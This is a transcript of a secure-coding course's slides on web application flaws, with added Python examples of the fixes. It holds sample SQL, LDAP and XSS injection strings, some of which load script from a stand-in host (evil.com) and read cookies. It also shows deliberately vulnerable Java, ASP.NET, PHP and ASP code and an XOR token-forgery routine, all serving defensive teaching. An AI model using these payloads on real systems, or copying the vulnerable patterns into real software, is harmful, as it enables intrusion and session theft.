Application and Website Security -- Fundamental Edition

Transcript of Application and Website Security -- Fundamental Edition

Page 1: Application and Website Security -- Fundamental Edition

Application and Website Security – Fundamental Edition

Daniel Owens, IT Security Professional

Page 2: Application and Website Security -- Fundamental Edition

Agenda

Course Introduction

Common Input Validation Flaws

Common Access Control Flaws

Common Encryption Flaws

Tools

Conclusion And Appendices

Page 3: Application and Website Security -- Fundamental Edition

Purpose

Drum up interest

Session Prerequisites

None

Page 4: Application and Website Security -- Fundamental Edition

Communication Media and Security Concerns

Communication media:

'Wired' networks

'Wireless' networks

Security concerns:

The Insider

The Outsider

The Technology

Nature

Page 5: Application and Website Security -- Fundamental Edition

A Note About Security

Security helps functionality – if it doesn’t help functionality, it isn’t security.

-Daniel Owens

Page 6: Application and Website Security -- Fundamental Edition

Consequences of Poor Security

Stolen intellectual property

System downtime

Lost productivity

Damage to NASA's reputation

Lost public confidence

Lost revenue

Congressional inquiries

Page 7: Application and Website Security -- Fundamental Edition

Agenda

Course Introduction

Common Input Validation Flaws

Common Access Control Flaws

Common Encryption Flaws

Tools

Conclusion And Appendices

Page 8: Application and Website Security -- Fundamental Edition

SQL | LDAP Injection

SQL and LDAP Injection

The injection of attacker-controlled text into a query so that it is parsed as query syntax, bypassing filtering and executing a query of the attacker's choosing

Can be thwarted using strongly typed variables, parameterized statements, escaping for the target syntax (SQL or LDAP filter), and whitelists

Example Strings include:

1'1

%31%27%20%4F%52%20%27%31%27%3D%27%31

&#49&#39&#32&#79&#82&#32&#39&#49&#39&#61&#39&#49

*(|(mail=*))

Page 9: Application and Website Security -- Fundamental Edition

Java SQL Injection

import java.sql.Connection;
import java.sql.DriverManager;
import java.sql.ResultSet;
import java.sql.SQLException;
import java.sql.Statement;

// Class name added so the slide's fragment compiles; the logic is unchanged and deliberately vulnerable
public class VulnerableLogin {
    public static void main(String[] args) throws SQLException {
        String username = args[0];
        String password = args[1]; // never checked: the query returns uid/pass pairs for every match
        // Untrusted input is concatenated straight into the SQL text
        String query = "SELECT uid, pass FROM users WHERE uid LIKE '" + username + "%'";
        Connection conn = DriverManager.getConnection("jdbc:odbc:logistics", "admin", "LetMeIn");
        Statement stmnt = conn.createStatement();
        ResultSet rs = stmnt.executeQuery(query);
    }
}
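The following is an added example, not code from the slides: it rebuilds the Java slide's query against an in-memory SQLite table (the three users rows are constructed for the demo) so the bypass can be run, then shows the parameterized and whitelisted forms, and an LDAP filter-escaping routine (RFC 4515 style) for the `*(|(mail=*))` string on the previous slide. The payload `x' OR '1' LIKE '1` is chosen to fit this particular LIKE template; the slide's `1' OR '1'='1` is the same idea against an `=` comparison.

```python
import re
import sqlite3


def make_db():
    """Constructed sample data (assumption, not from the slides)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (uid TEXT, pass TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?)",
        [("admin", "LetMeIn"), ("alice", "s3cret"), ("bob", "hunter2")],
    )
    return conn


def lookup_vulnerable(conn, username):
    """Same construction as the Java slide: the attacker's text becomes part of the SQL."""
    query = "SELECT uid, pass FROM users WHERE uid LIKE '" + username + "%'"
    return conn.execute(query).fetchall()


def lookup_parameterized(conn, username):
    """The driver sends the value out of band; quotes in it never reach the SQL parser.
    Note that '%' and '_' are still LIKE wildcards, which is why a whitelist is also needed."""
    query = "SELECT uid, pass FROM users WHERE uid LIKE ?"
    return conn.execute(query, (username + "%",)).fetchall()


USERNAME_RE = re.compile(r"^[A-Za-z0-9_.-]{1,32}$")


def lookup_whitelisted(conn, username):
    """Whitelist first (rejects quotes, spaces and wildcards), then parameterize anyway."""
    if not USERNAME_RE.fullmatch(username):
        raise ValueError("rejected username: %r" % username)
    return lookup_parameterized(conn, username)


# Characters with meaning inside an LDAP search filter, and their RFC 4515 escapes
LDAP_ESCAPES = {"\\": r"\5c", "*": r"\2a", "(": r"\28", ")": r"\29", "\0": r"\00"}


def ldap_filter_escape(value):
    return "".join(LDAP_ESCAPES.get(ch, ch) for ch in value)


def ldap_user_filter(user):
    """Builds a filter for one user; an injected '*(|(mail=*))' stays a literal string."""
    return "(&(objectClass=person)(uid=%s))" % ldap_filter_escape(user)
```

Running `lookup_vulnerable(make_db(), "x' OR '1' LIKE '1")` returns all three rows, the same input through `lookup_parameterized` returns none, and `lookup_whitelisted` refuses it before a query is built.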

Page 10: Application and Website Security -- Fundamental Edition

Demonstration 1

SQL Injection

Bypassing Security Checks

Page 11: Application and Website Security -- Fundamental Edition

Case Study 1

SQL Injection

Owning Networks

Page 12: Application and Website Security -- Fundamental Edition

Cross-Site Scripting (XSS)

XSS

The injection of client-side code

Comes in three kinds:

Persistent

Non-Persistent

DOM

Only occurs when user input influences the output (HTML, script, style, or a URL the browser will act on)

Can be stopped by assuming all input is malicious until proven otherwise through a whitelist, and by encoding anything untrusted for the context it is written into (HTML body, attribute, script, URL)

Can lead to a complete system compromise – for the client, the website, and the server

Page 13: Application and Website Security -- Fundamental Edition

Cross-Site Scripting (cont.)

XSS (cont.)

Sample strings:

<script src=http://evil.com/attack.js << </script <<

<link rel="stylesheet" href=http://evil.com/attack.css>

%3Cscript%3Epref%3Dfunction(a%2Cb) {document.write(a%2B%22%20-%3E%20%22%2Bb%2B%22%3Cbr%20%2F%3E%22)%3B} %3B%3C%2Fscript%3E%3Cscript%20src%3D%22view-source%3Aresource%3A%2F%2F%2Fgreprefs%2Fall.js%22%3E%3C%2Fscript%3E

<img src="" onMouseOver="alert(document.cookie)"; />

Page 14: Application and Website Security -- Fundamental Edition

ASP.NET Cross-Site Scripting

<%@ Page Language="C#" ValidateRequest="false" %>
<html>
<script runat="server">
    // Echoes the text box straight back into the page: no output encoding,
    // and ASP.NET request validation has been switched off above
    void btnSubmit_Click(Object sender, EventArgs e)
    {
        Response.Write(txtString.Text);
    }
</script>
<%-- continued on next slide --%>

Page 15: Application and Website Security -- Fundamental Edition

ASP.NET Cross-Site Scripting (cont.)

<%-- continued from previous slide --%>
<body>
    <form id="form1" runat="server">
        <asp:TextBox id="txtString" runat="server"
            Text="<script>alert('hi');</script>" />
        <asp:Button id="btnSubmit" runat="server"
            OnClick="btnSubmit_Click"
            Text="Submit" />
    </form>
</body>
</html>
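An added example (not from the slides, and not ASP.NET): a Python version of the fix for the `Response.Write(txtString.Text)` pattern above, using the standard library's `html.escape` and `urllib.parse.quote` for context-specific output encoding plus a whitelist for fields that have a known shape. The payload list is constructed from the sample strings on the previous two slides; the display-name regex and the `/search?q=` link template are assumptions for the demo.

```python
import html
import re
from urllib.parse import quote

# Constructed copies of the slide's sample strings plus the TextBox value from the ASP.NET slide
SAMPLE_PAYLOADS = [
    "<script src=http://evil.com/attack.js << </script <<",
    '<link rel="stylesheet" href=http://evil.com/attack.css>',
    '<img src="" onMouseOver="alert(document.cookie)"; />',
    "<script>alert('hi');</script>",
    "&#49&#39&#32&#79&#82",  # entity-encoded text must be shown literally, never re-decoded
]


def encode_for_html_body(value):
    """Untrusted text placed between tags: & < > " and ' become entities."""
    return html.escape(value, quote=True)


def encode_for_html_attribute(value):
    """Same entity set; the template must also wrap the attribute value in quotes."""
    return html.escape(value, quote=True)


def encode_for_url_param(value):
    """Untrusted text placed inside a URL query component."""
    return quote(value, safe="")


DISPLAY_NAME_RE = re.compile(r"^[A-Za-z0-9 ._-]{1,40}$")  # assumed shape of a display name


def render_greeting(display_name):
    """Hardened Response.Write: whitelist first, then encode anyway (defense in depth)."""
    if not DISPLAY_NAME_RE.fullmatch(display_name):
        raise ValueError("display name rejected by whitelist: %r" % display_name)
    return "<p>Hello, %s</p>" % encode_for_html_body(display_name)


def render_search_link(term):
    """One untrusted value in three contexts at once, each with its own encoder."""
    return '<a href="/search?q=%s" title="%s">%s</a>' % (
        encode_for_url_param(term),
        encode_for_html_attribute(term),
        encode_for_html_body(term),
    )


def all_neutralized():
    """True when no sample payload survives body encoding with a raw '<' in it."""
    return all("<" not in encode_for_html_body(p) for p in SAMPLE_PAYLOADS)
```

Whitelisting alone is not enough for free-text fields (a comment box legitimately contains `<`), and encoding alone fails when the value lands in a context the encoder was not written for (an `href` receiving `javascript:`), which is why `render_search_link` encodes per context.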

Page 16: Application and Website Security -- Fundamental Edition

Demonstration 2

XSS

Having Fun

Page 17: Application and Website Security -- Fundamental Edition

Remote File Include/Execution | Code Injection

Remote File Include and Execution

An attacker tricks the system into including and/or executing arbitrary files

Code Injection

Attacker tricks the system into executing arbitrary code by injecting the commands into the code

Both

Code of the attacker's choosing is executed

Contrary to popular belief, ANY language can suffer this

Page 18: Application and Website Security -- Fundamental Edition

PHP Remote File Include

<?php
....
// Both paths come straight from the query string; with allow_url_include enabled
// they can even be remote URLs, so the attacker's file is fetched and executed
require_once($_GET['config']);
require_once($_GET['base']."/index.php");
....
?>

Page 19: Application and Website Security -- Fundamental Edition

ASP (Classic) Remote File Include

<%
....
' Classic ASP (VBScript): the query string is used, unchecked, as the URL to fetch,
' and whatever the remote server returns is written straight into the response
url = Request.QueryString
set xml = Server.CreateObject("Microsoft.XMLHTTP")
xml.open "GET", url, false
xml.send ""
Response.Write xml.responseText
set xml = nothing
....
%>

Page 20: Application and Website Security -- Fundamental Edition

Hidden Elements | Cookies

Hidden Elements and Cookies

Hidden fields and cookies were merely intended to provide data storage without cluttering up the user's view

They do not provide secure storage: anything in them is visible to the client

They are not immutable storage locations: anything in them can be rewritten by the client

Neither should contain sensitive information

Both should be considered malicious until proven otherwise

Any data in them should not be directly used for output

Whitelisting should be used to prove innocence

Page 21: Application and Website Security -- Fundamental Edition

Hidden Elements | Cookies (cont.)

Hidden Elements and Cookies (cont.)

[Slide image: a decoded ASP.NET hidden-field (ViewState) dump from a NASA CMTOOLS login page (ReferrerUrl https://XXX.XXX.nasa.gov/CMTOOLS/Login.aspx?ReturnUrl=/CMTOOLS/ErrorPage.aspx), showing server-side state stored in the hidden field and a user-list entry whose display text carries injected markup: USERNAME (<a href=pizza.gov>pizza is good for you</a>USERACCOUNT)]
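An added example, not from the slides: since a hidden field or cookie can be rewritten by the client, a server that must round-trip state through one can at least make tampering detectable by appending an HMAC computed with a key the client never sees. The key, the `price`/`role` payload and the `tamper` helper (which plays the attacker) are all constructed for the demo. Sealing gives integrity only; it does not hide the contents, so the slide's rule that nothing sensitive goes in them still applies.

```python
import base64
import hashlib
import hmac
import json

# Assumption: loaded from server configuration and rotated; never sent to the client
SERVER_KEY = b"constructed-demo-key-do-not-reuse"


def _b64(raw):
    return base64.urlsafe_b64encode(raw).decode()


def seal(payload):
    """Serialize a dict and append an HMAC-SHA256 tag: '<b64 body>.<b64 tag>'.
    urlsafe base64 never contains '.', so the separator is unambiguous."""
    body = json.dumps(payload, sort_keys=True, separators=(",", ":")).encode()
    tag = hmac.new(SERVER_KEY, body, hashlib.sha256).digest()
    return _b64(body) + "." + _b64(tag)


def unseal(token):
    """Return the dict if the tag verifies, else None. Malformed input is treated as tampered."""
    try:
        body_b64, tag_b64 = token.rsplit(".", 1)
        body = base64.urlsafe_b64decode(body_b64)
        tag = base64.urlsafe_b64decode(tag_b64)
    except (ValueError, TypeError):  # binascii.Error is a ValueError subclass
        return None
    expected = hmac.new(SERVER_KEY, body, hashlib.sha256).digest()
    if not hmac.compare_digest(tag, expected):  # constant-time compare
        return None
    return json.loads(body)


def tamper(token, old, new):
    """Attacker side: decode the body, edit it, re-encode it, keep the old tag.
    This is exactly what works against an unsigned hidden field or cookie."""
    body_b64, tag_b64 = token.rsplit(".", 1)
    body = base64.urlsafe_b64decode(body_b64).decode()
    return _b64(body.replace(old, new).encode()) + "." + tag_b64
```

The server stores no per-client state here, which is the reason hidden fields are used in the first place; the cost is that a sealed value can still be replayed unchanged, so anything that must not be reused (an order id, a one-time token) needs a server-side check as well.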

Page 22: Application and Website Security -- Fundamental Edition

Agenda

Course Introduction

Common Input Validation Flaws

Common Access Control Flaws

Common Encryption Flaws

Tools

Conclusion And Appendices

Page 23: Application and Website Security -- Fundamental Edition

Session Hijacking – Cookie Theft

Cookie Theft

The theft of a client's session cookies by an attacker, who then presents them as their own

Often possible because of other vulnerabilities – browser flaws (sandbox escapes), HTTP TRACE left enabled (cross-site tracing), XSS, etc.

Can be hampered if the server binds each session to its client (the slides call this a NONCE; strictly, a nonce is a value used once, and what is described here is session binding)

The binding should be a set of characteristics unique to the specific session – client IP, server IP, server port, user-agent string, and other key information – so a cookie replayed from a different client is rejected; note that binding to client IP breaks legitimate users behind NAT, proxies, and mobile networks

Additional mechanisms include the Secure flag (cookie sent over HTTPS only) and the HttpOnly flag (cookie not readable from script, which defeats the document.cookie payloads shown earlier), but these have limited impact: they do not stop theft via a compromised browser or server

Page 24: Application and Website Security -- Fundamental Edition

Session Hijacking – Session Fixation

Session Fixation

An attacker uses a 'known' session ID

Often, the attacker opens the session and keeps it open while attempting to convince a victim to login using the known session

This is often a phishing or other social engineering attack

Can be hampered if session IDs are 'rekeyed' on login AND sessions expire and are removed quickly

Difficult to stop if sessions are guessable
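An added example, not from the slides, covering the defenses of the last two slides in one place: a server-side session store that issues unguessable IDs, rekeys on login so a pre-planted ID is retired, expires idle sessions, and binds each session to the user-agent string (one of the characteristics the cookie-theft slide lists; client IP is omitted on purpose because of the NAT/proxy caveat). The 15-minute timeout, the user-agent strings and the `fixation_scenario` walk-through are constructed for the demo.

```python
import secrets
import time


class SessionStore:
    """Server-side session table with rekey-on-login, idle expiry and client binding."""

    def __init__(self, idle_timeout=900, clock=time.time):
        self.sessions = {}          # session id -> {"user", "ua", "last"}
        self.idle_timeout = idle_timeout
        self.clock = clock          # injectable so expiry can be exercised without sleeping

    @staticmethod
    def _new_id():
        return secrets.token_urlsafe(32)   # 256 random bits: not guessable, not enumerable

    def begin(self, user_agent):
        """Anonymous (pre-login) session, e.g. for a shopping cart."""
        sid = self._new_id()
        self.sessions[sid] = {"user": None, "ua": user_agent, "last": self.clock()}
        return sid

    def lookup(self, sid, user_agent):
        """Resolve a presented cookie; stale or mis-bound sessions are destroyed, not returned."""
        s = self.sessions.get(sid)
        if s is None:
            return None
        now = self.clock()
        if now - s["last"] > self.idle_timeout or s["ua"] != user_agent:
            del self.sessions[sid]
            return None
        s["last"] = now
        return s

    def login(self, presented_sid, user_agent, user):
        """Rekey: whatever id the client presented (attacker-chosen or not) is retired,
        and the authenticated state lives only under a freshly generated id."""
        self.sessions.pop(presented_sid, None)
        new_sid = self._new_id()
        self.sessions[new_sid] = {"user": user, "ua": user_agent, "last": self.clock()}
        return new_sid


def session_cookie(sid):
    """Secure: HTTPS only. HttpOnly: not readable via document.cookie (the onMouseOver payload)."""
    return "Set-Cookie: SESSIONID=%s; Path=/; Secure; HttpOnly; SameSite=Lax" % sid


def fixation_scenario():
    """Attacker obtains a valid id, plants it on the victim, victim logs in.
    Returns (store, planted id, id the victim actually ends up with)."""
    store = SessionStore()
    planted = store.begin("Mozilla/5.0 (attacker)")
    # ...the victim is phished into presenting `planted`, then authenticates:
    victim_sid = store.login(planted, "Mozilla/5.0 (victim)", "dowens")
    return store, planted, victim_sid
```

After `login`, the planted ID no longer exists in the store, so the attacker who kept it "open" gets nothing; the victim's real session lives under an ID the attacker never saw.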

Page 25: Application and Website Security -- Fundamental Edition

Demonstration 3

Session Hijacking

Session Fixation

Page 26: Application and Website Security -- Fundamental Edition

Directory Traversal

Directory Traversal

An attacker is able to trick the system into traversing the directory structure

In many instances, arbitrary files can be viewed

Attackers are often attempting to execute a file or gather information

If user input dictates the output, care must be taken to ensure the input is 'valid'

Whitelists become invaluable

In extreme cases, an attacker can actually use this to gain administrator access to the server

Page 27: Application and Website Security -- Fundamental Edition

PHP Directory Traversal

<?php
....
// $date is used unmodified as a file name: ../../etc/passwd walks straight out of calendar/
$date=$_GET['date'];
if($handle=fopen("calendar/$date","rb")){
    print(fread($handle,filesize("calendar/$date")));
    fclose($handle);
}
....
?>
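An added example, not from the slides, that serves both the file-include slides (Pages 17–19) and the directory-traversal slides (Pages 26–27), since the fix is the same: user input must never be used as a path, only as a key or a tightly whitelisted fragment, and the resolved path must be checked to lie under the intended directory. It is written in Python rather than PHP; the temporary web root, the `calendar/` and `config/` files and the `YYYY-MM-DD` date format are constructed for the demo.

```python
import os
import re
import tempfile


def build_sample_tree():
    """Constructed sandbox (assumption): a web root with calendar/ and config/ subdirectories."""
    root = tempfile.mkdtemp()
    os.makedirs(os.path.join(root, "calendar"))
    os.makedirs(os.path.join(root, "config"))
    with open(os.path.join(root, "calendar", "2009-05-01.txt"), "w") as f:
        f.write("launch window: 09:00-11:00\n")
    with open(os.path.join(root, "config", "default.php"), "w") as f:
        f.write("<?php $debug = false; ?>\n")
    with open(os.path.join(root, "secret.txt"), "w") as f:
        f.write("outside calendar/: must never be readable via ?date=\n")
    return root


DATE_RE = re.compile(r"^\d{4}-\d{2}-\d{2}$")          # whitelist for the ?date= parameter
ALLOWED_CONFIGS = {                                    # ?config= is a key, never a path
    "default": "config/default.php",
    "debug": "config/debug.php",
}


def resolve_under(base_dir, user_path):
    """Canonicalize base and target and refuse anything that resolves outside base.
    realpath() also follows symlinks, so a planted link cannot point out of the tree."""
    base = os.path.realpath(base_dir)
    target = os.path.realpath(os.path.join(base, user_path))
    if os.path.commonpath([base, target]) != base:
        raise PermissionError("path escapes %s: %r" % (base_dir, user_path))
    return target


def read_calendar(root, date):
    """Hardened form of the PHP slide: ?date= selects a file under calendar/."""
    if not DATE_RE.fullmatch(date):
        raise ValueError("date rejected by whitelist: %r" % date)
    path = resolve_under(os.path.join(root, "calendar"), date + ".txt")
    with open(path) as f:
        return f.read()


def include_config(root, name):
    """Hardened form of require_once($_GET['config']): look the name up, then include
    only a file we control. A URL or '../' is simply not a key and is rejected."""
    if name not in ALLOWED_CONFIGS:
        raise ValueError("unknown config: %r" % name)
    return resolve_under(root, ALLOWED_CONFIGS[name])
```

`resolve_under` alone is not sufficient for the include case: `http://evil.com/shell.txt` joined onto the web root resolves to a harmless nonexistent path under the root, so it would pass the containment check. That is why `include_config` maps the parameter through a fixed table first; the containment check is the second layer, protecting against mistakes in the table itself.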

Page 28: Application and Website Security -- Fundamental Edition

Agenda

Course Introduction

Common Input Validation Flaws

Common Access Control Flaws

Common Encryption Flaws

Tools

Conclusion And Appendices

Page 29: Application and Website Security -- Fundamental Edition

Session Hijacking – Spoofing

Spoofing

Pretending to be someone else, an attacker attempts to gain the victim's privileges

Comes in three basic forms

Blind (write-only)

Half pipe (read-only)

Full pipe

Network configuration and other protection mechanisms can make this difficult to defeat (both for the attacker and for the developer)

Page 30: Application and Website Security -- Fundamental Edition

Demonstration 4

Session Hijacking

Spoofing

Page 31: Application and Website Security -- Fundamental Edition

Case Study 2

Session Hijacking

Spoofing

Page 32: Application and Website Security -- Fundamental Edition

Weak Encryption | Using Encoding

Weak/Home-Grown Encryption

The use of weak and home-grown encryption has led to the compromise of many systems

It is also what makes session hijacking via spoofing, and man-in-the-middle with bucket-brigade and substitution attacks, so trivial: once the key can be recovered or the ciphertext can be edited undetected, the attacker forges tokens the server accepts as its own

Encoding

The use of algorithms that take data and simply change its representation (normally the number of bits used per character, e.g. Base64, hex, URL encoding); there is no key, so anyone who knows the format can reverse it

This is not secure by any means – encoding is not encryption

Page 33: Application and Website Security -- Fundamental Edition

Case Study 3

Weak Encryption | Encoding

XORSHA

Base64
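An added example, not from the slides or the case study itself, that makes the two points of the previous slide concrete: Base64 is reversed by anyone without a key, and a home-grown repeating-key XOR "cipher" gives up its key to a known-plaintext attack and then lets the attacker forge a token the server accepts. The four-byte server key, the `user=...;role=...` token layout and the known `user=` prefix are constructed assumptions for the demo; the case study's XOR scheme may differ in detail, but the method of attack is the same.

```python
import base64


def base64_hide(secret):
    """'Encoding' used as if it were encryption: there is no key protecting anything."""
    return base64.b64encode(secret.encode()).decode()


def base64_reveal(token):
    return base64.b64decode(token).decode()


def xor_bytes(data, key):
    """Repeating-key XOR, the usual core of home-grown 'encryption'.
    Encryption and decryption are the same operation."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


# Constructed server secret; any short repeating key is equally weak
SERVER_XOR_KEY = b"\x5a\x13\xc7\x2e"


def make_token(user, role):
    """Server side: 'encrypt' a session token with the secret key."""
    return xor_bytes(("user=%s;role=%s" % (user, role)).encode(), SERVER_XOR_KEY)


def server_parse(token):
    """Server side: decrypt and trust whatever comes out."""
    plain = xor_bytes(token, SERVER_XOR_KEY).decode(errors="replace")
    return dict(field.split("=", 1) for field in plain.split(";"))


def break_repeating_xor(ciphertext, known_prefix):
    """Known-plaintext attack. Every token starts with the same bytes ('user='), so for each
    candidate key length the attacker XORs that prefix against the ciphertext to get a key,
    and keeps the first length whose key decrypts the whole known prefix consistently."""
    for k in range(1, len(known_prefix)):
        key = xor_bytes(ciphertext[:k], known_prefix[:k])
        if xor_bytes(ciphertext[: len(known_prefix)], key) == known_prefix:
            return key
    return None


def forge(ciphertext, known_prefix, old, new):
    """Recover the key, edit the plaintext, re-encrypt: the server cannot tell it from its own."""
    key = break_repeating_xor(ciphertext, known_prefix)
    if key is None:
        raise ValueError("key is at least as long as the known prefix; need more known plaintext")
    return xor_bytes(xor_bytes(ciphertext, key).replace(old, new), key)
```

`forge(make_token("dowens", "user"), b"user=", b"role=user", b"role=admin")` yields a token that `server_parse` reads as an admin session, which is the spoofing case of the previous slides. The fix is not a longer XOR key but a standard authenticated construction (a vetted cipher plus a MAC, or an AEAD mode) or, better, keeping the state server-side and issuing only a random identifier.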

Page 34: Application and Website Security -- Fundamental Edition

Agenda

Course Introduction

Common Input Validation Flaws

Common Access Control Flaws

Common Encryption Flaws

Tools

Conclusion and Appendices

Page 35: Application and Website Security -- Fundamental Edition

Security Compass

XSS-Me

A free Firefox plug-in

Performs semi-automated XSS attacks against POST fields

SQL Inject-Me

A free Firefox plug-in

Performs semi-automated SQL injection attacks against POST fields

Access-Me

A free Firefox plug-in…

Page 36: Application and Website Security -- Fundamental Edition

Other Firefox Add-ons

Web Developer Add-on

Free

Lets you view source files cleanly and easily

Lets you quickly enable and disable things (like cookies, JavaScript, and Meta Refresh)

Lets you view and modify form fields and cookie data

Tamper Data

Free

Lets you modify most request data before it leaves the browser

Page 37: Application and Website Security -- Fundamental Edition

Fuzzers

BED.pl

Free Perl script

Performs basic tests of your SERVER

JBroFuzz

Free Java application

Lets you fuzz any part of an HTTP/HTTPS request in a semi-automated fashion

Powerfuzzer

Free and commercial versions (Python script)

Easy and multi-talented… automated

Page 38: Application and Website Security -- Fundamental Edition

Other Tools

Sothink SWF Decompiler

Decompiles Adobe Flash (SWF) and Flex output back to ActionScript

Cavaj

Free

Decompiles any Java program

Nikto

Free

Provides scans of the website looking for common, basic vulnerabilities and misconfigurations

Page 39: Application and Website Security -- Fundamental Edition

Agenda

Course Introduction

Common Input Validation Flaws

Common Access Control Flaws

Common Encryption Flaws

Tools

Conclusion And Appendices

Page 40: Application and Website Security -- Fundamental Edition

For More Information

Microsoft Security Site (all audiences)

http://www.microsoft.com/security

MSDN Security Site (developers)

http://msdn.microsoft.com/security

TechNet Security Site (IT professionals)

http://www.microsoft.com/technet/security

SANS Top-20 (IT Professionals)

http://www.sans.org/top20/

Page 42: Application and Website Security -- Fundamental Edition

Acknowledgements

I stole the background from Microsoft

I stole a lot from my experiences and previous writings